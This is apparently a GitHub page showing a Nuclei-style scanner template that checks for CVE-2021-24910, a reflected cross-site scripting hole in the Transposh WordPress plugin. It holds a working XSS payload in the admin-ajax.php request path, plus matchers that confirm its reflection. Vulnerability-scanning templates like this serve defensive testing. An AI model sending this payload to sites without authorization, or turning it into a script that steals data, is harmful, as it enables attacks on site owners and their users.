-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2021-24910.yaml
37 lines (32 loc) · 1.03 KB
/
CVE-2021-24910.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
id: CVE-2021-24910
info:
name: Transposh WordPress < 1.0.7 - Reflected Cross-Site Scripting (XSS)
author: Screamy
severity: medium
reference:
- https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt
- https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24910
metadata:
verified: true
tags: cve,cve2021,wordpress,wp-plugin,xss,wp
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>'
- '{"result":'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200